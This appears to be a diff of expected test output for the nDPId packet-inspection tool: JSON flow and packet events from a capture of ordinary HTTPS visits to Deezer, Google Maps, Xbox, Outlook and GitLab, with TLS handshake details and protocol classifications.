-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} -01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pPxAAEAGnczAqAGAbIrHQ6iOAbuXn2EVbcUWL4AYAfaXogAAAQEIClbSwYKPYc1DFgMBAgABAAH8AwNMrbkme+2pG6WKGaUcTfCs10ic95it0jPiimTr5KWaaiCmUwwyrZpDXgONpktntKRQJ28LAppHGUwuuBwH65AqlAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAApkZWV6ZXIuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIAS3iFI+Lml2aqbJ99HMOh2pxKpjuORM+VA6AJN2jS5cABcAQQS2OgHZ7hQeCCurKRe6Z6o4CXtv3DRVG4xO7HV8XVI+fMr+wQD4VFXUBMvHu9XDFEguxQ+LZymMWbInoPBoAAbBACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482940480,"flow_last_seen":1646482940480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482940480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} 
-01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} 
-01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBWvkXIQj27ydSlWNcrtPVAAtDjckdSwzserfJQbjqaWAAXAEEEmLcB97hFECojXeQm9a5elnWgKYRExdFmjiW10ZfBGP+icRnFpjaWBz97zhMeOCLZ79LJYWeVZvs9jOUTVoTTCAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} 
+01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 